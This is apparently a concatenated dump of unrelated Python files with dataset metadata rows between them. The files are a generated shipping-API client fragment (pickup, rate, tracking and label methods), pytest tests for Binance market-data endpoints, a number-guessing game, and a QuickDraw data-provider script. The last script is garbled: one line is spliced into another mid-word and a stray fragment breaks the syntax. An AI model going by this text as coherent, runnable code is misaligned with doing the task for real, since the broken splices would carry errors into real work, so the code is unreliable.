**kwargs
):
"""Cancel a pickup # noqa: E501
Cancel a pickup previously scheduled # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupCancelRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OperationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.cancel_pickup_endpoint.call_with_http_info(**kwargs)
def fetch_rates(
self,
data,
**kwargs
):
"""Fetch shipment rates # noqa: E501
The Shipping process begins by fetching rates for your shipment. Use this service to fetch a shipping rates available. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetch_rates(data, async_req=True)
>>> result = thread.get()
Args:
data (RateRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['data'] = \
data
return self.fetch_rates_endpoint.call_with_http_info(**kwargs)
def schedule_pickup(
self,
carrier_name,
data,
**kwargs
):
"""Schedule a pickup # noqa: E501
Schedule one or many parcels pickup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schedule_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PickupResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.schedule_pickup_endpoint.call_with_http_info(**kwargs)
def track_shipment(
self,
tracking_number,
carrier_name,
**kwargs
):
"""Track a shipment # noqa: E501
You can track a shipment by specifying the carrier and the shipment tracking number. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.track_shipment(tracking_number, carrier_name, async_req=True)
>>> result = thread.get()
Args:
tracking_number (str):
carrier_name (str):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
TrackingResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tracking_number'] = \
tracking_number
kwargs['carrier_name'] = \
carrier_name
return self.track_shipment_endpoint.call_with_http_info(**kwargs)
def update_pickup(
self,
carrier_name,
data,
**kwargs
):
"""Update a pickup # noqa: E501
Modify a scheduled pickup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupUpdateRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PickupResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.update_pickup_endpoint.call_with_http_info(**kwargs)
def void_label(
self,
carrier_name,
data,
**kwargs
):
"""Void a shipment label # noqa: E501
Cancel a shipment and the label previously created # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.void_label(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (ShipmentCancelRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OperationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.void_label_endpoint.call_with_http_info(**kwargs)
| 39.023689 | 1,831 | 0.487578 | 4,152 | 46,126 | 5.212909 | 0.090559 | 0.035576 | 0.016818 | 0.017464 | 0.822907 | 0.803271 | 0.78613 | 0.776243 | 0.768943 | 0.760257 | 0 | 0.003475 | 0.426029 | 46,126 | 1,181 | 1,832 | 39.056732 | 0.814051 | 0.35635 | 0 | 0.727494 | 0 | 0 | 0.247309 | 0.034524 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009732 | false | 0 | 0.019465 | 0 | 0.038929 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f37513da9f3f37fb8758275c36c7f48c27735167 | 14,041 | py | Python | src/tests/client/endpoints/test_market.py | rvillebro/binance | 1b92a35f8deb00afb904b4c25e84be064f1b07ca | [
"MIT"
] | 5 | 2021-11-02T10:16:38.000Z | 2022-01-28T21:39:41.000Z | src/tests/client/endpoints/test_market.py | rvillebro/binance | 1b92a35f8deb00afb904b4c25e84be064f1b07ca | [
"MIT"
] | null | null | null | src/tests/client/endpoints/test_market.py | rvillebro/binance | 1b92a35f8deb00afb904b4c25e84be064f1b07ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import pytest
from typing import TYPE_CHECKING
from pydantic import ValidationError
if TYPE_CHECKING:
from binance.client import Client
def test_aggregated_trades(client: 'Client'):
func = client.market.aggregated_trades
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
response = func(symbol='BTCUSDT', limit=1)
assert response.status == 200
from_id = response.data[0]['a']
response = func(symbol='BTCUSDT', fromId=from_id, limit=1)
assert response.status == 200
start_time = response.data[0]['T']
end_time = start_time + 1
response = func(symbol='BTCUSDT', fromId=from_id, startTime=start_time)
assert response.status == 200
response = func(symbol='BTCUSDT', fromId=from_id, endTime=end_time)
assert response.status == 200
response = func(symbol='BTCUSDT',
fromId=from_id,
startTime=start_time,
endTime=end_time)
assert response.status == 200
def test_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_continues_contract_klines(client: 'Client'):
from binance.enums.binance import ContractType, KlineInterval
func = client.market.continues_contract_klines
with pytest.raises(ValidationError):
func()
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_index_price_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.index_price_klines
with pytest.raises(ValidationError):
func()
response = func(pair='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(pair='BTCUSDT', interval=KlineInterval.ONE_MINUTE, limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_mark_price_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.mark_price_klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_mark_price(client: 'Client'):
func = client.market.mark_price
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_funding_rate_history(client: 'Client'):
func = client.market.funding_rate_history
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
start_time = response.data[0]['fundingTime']
end_time = start_time + 1
response = func(symbol='BTCUSDT', startTime=start_time)
assert response.status == 200
response = func(symbol='BTCUSDT', endTime=end_time)
assert response.status == 200
response = func(symbol='BTCUSDT', startTime=start_time, endTime=end_time)
assert response.status == 200
def test_ticker_price_change_statistics(client: 'Client'):
func = client.market.ticker_price_change_statistics
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_ticker_price(client: 'Client'):
func = client.market.ticker_price
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_ticker_order_book(client: 'Client'):
func = client.market.ticker_order_book
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_open_interest(client: 'Client'):
pytest.skip("not working at the moment")
func = client.market.open_interest
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_open_interest_history(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.open_interest_history
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_top_long_short_account_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.top_long_short_account_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_top_long_short_position_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.top_long_short_position_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_global_long_short_account_ratio(client: 'Client'):
pytest.skip()
from binance.enums.binance import Period
func = client.market.global_long_short_account_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_taker_long_short_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.taker_long_short_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_lvt_klines(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import KlineInterval
func = client.market.lvt_klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BLZUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_composite_index_info(client: 'Client'):
func = client.market.composite_index_info
response = func()
assert response.status == 200
response = func(symbol='DEFIUSDT')
assert response.status == 200
| 32.130435 | 79 | 0.637277 | 1,450 | 14,041 | 6.058621 | 0.062759 | 0.096983 | 0.161639 | 0.185885 | 0.945248 | 0.927035 | 0.915993 | 0.903472 | 0.886966 | 0.844735 | 0 | 0.02781 | 0.267574 | 14,041 | 436 | 80 | 32.204128 | 0.826429 | 0.001496 | 0 | 0.819527 | 0 | 0 | 0.055567 | 0 | 0 | 0 | 0 | 0 | 0.210059 | 1 | 0.053254 | false | 0 | 0.04142 | 0 | 0.094675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
34803de4f93620fb568b7426492b158574df0567 | 1,675 | py | Python | GuessingGame.py | aatrey56/guessing-game | 6d0d4d47354c38abf49f68e8817221807a97c65c | [
"MIT"
] | null | null | null | GuessingGame.py | aatrey56/guessing-game | 6d0d4d47354c38abf49f68e8817221807a97c65c | [
"MIT"
] | null | null | null | GuessingGame.py | aatrey56/guessing-game | 6d0d4d47354c38abf49f68e8817221807a97c65c | [
"MIT"
] | null | null | null | import random
print ("Hi! I'm thinking of a random number between 1 and 100.")
print()
guessing_num = random.randint(1,100)
i=1
while i<8:
print ("--- Attempt "+str(i)+"")
guessed_num =int(input("Guess what number I am thinking of :"))
if (guessed_num == guessing_num):
print("WINNER!!!!!!")
print(" The number was "+str(guessing_num)+"")
break
elif(guessed_num<guessing_num):
print("Too low")
print()
elif(guessed_num>guessing_num):
print("Too high")
print()
else:
print()
if(i==7):
print("Aw, you ran out of tries. The number was "+str(guessing_num)+".")
rerun = input("Do you want to play again, yes or no?")
if (rerun=="yes"):
print ("Hi! I'm thinking of a random number between 1 and 100.")
print()
guessing_num = random.randint(1,100)
b=1
while b<8:
print ("--- Attempt "+str(b)+"")
guessed_num =int(input("Guess what number I am thinking of :"))
if (guessed_num == guessing_num):
print("WINNER!!!!!!")
print(" The number was "+str(guessing_num)+"")
break
elif(guessed_num<guessing_num):
print("Too low")
print()
elif(guessed_num>guessing_num):
print("Too high")
print()
else:
print()
if(b==7):
print("Aw, you ran out of tries. The number was "+str(guessing_num)+".")
b+=1
i+=1
| 33.5 | 92 | 0.485373 | 202 | 1,675 | 3.925743 | 0.262376 | 0.166456 | 0.136192 | 0.15889 | 0.854981 | 0.854981 | 0.854981 | 0.854981 | 0.854981 | 0.854981 | 0 | 0.023099 | 0.379701 | 1,675 | 49 | 93 | 34.183673 | 0.740135 | 0 | 0 | 0.723404 | 0 | 0 | 0.247164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.468085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
cae1ba99961caf0a39ad8ee9b3240d92b6149336 | 2,322 | py | Python | quickdraw_data_provider_short_test_script.py | choobea/quickdraw_mlp | 267f9a6225d69c8fbb086b7814066e91fb56b370 | [
"BSD-3-Clause"
] | null | null | null | quickdraw_data_provider_short_test_script.py | choobea/quickdraw_mlp | 267f9a6225d69c8fbb086b7814066e91fb56b370 | [
"BSD-3-Clause"
] | null | null | null | quickdraw_data_provider_short_test_script.py | choobea/quickdraw_mlp | 267f9a6225d69c8fbb086b7814066e91fb56b370 | [
"BSD-3-Clause"
] | null | null | null | from data_providers import QuickDrawImageDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
train_data = QuickDrawImageDataProvider(which_set="train", batch_size=batch_size, rng=rng, num_classes_use=100)
val_data = QuickDrawImageDataProvider(which_set="valid", batch_size=batch_size, rng=rng, num_classes_use=100)
test_data = QuickDrawImageDataProvider(which_set="test", batch_size=batch_size, rng=rng, num_classes_use=100)
from data_providers import QuickDrawStrokeDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawCombinedDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawCombinedDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawCombinedDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
train_data = QuickDrawCombinedDataProvider(which_set="train", batch_size=batch_size, rng=rng)
train_data = QuickDrawStrokeDataProvider(which_set="train", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(whival_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
ch_set="valid", batch_size=batch_size, rng=rng)
test_data = QuickDrawStrokeDataProvider(which_set="test", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawStrokeDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
train_data = QuickDrawStrokeDataProvider(which_set="train", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
test_data = QuickDrawStrokeDataProvider(which_set="test", batch_size=batch_size, rng=rng)
| 38.7 | 131 | 0.820844 | 316 | 2,322 | 5.765823 | 0.091772 | 0.192645 | 0.130626 | 0.167947 | 0.88584 | 0.88584 | 0.88584 | 0.88584 | 0.88584 | 0.857849 | 0 | 0.013666 | 0.086133 | 2,322 | 59 | 132 | 39.355932 | 0.844958 | 0.018949 | 0 | 0.783784 | 0 | 0 | 0.036092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.27027 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
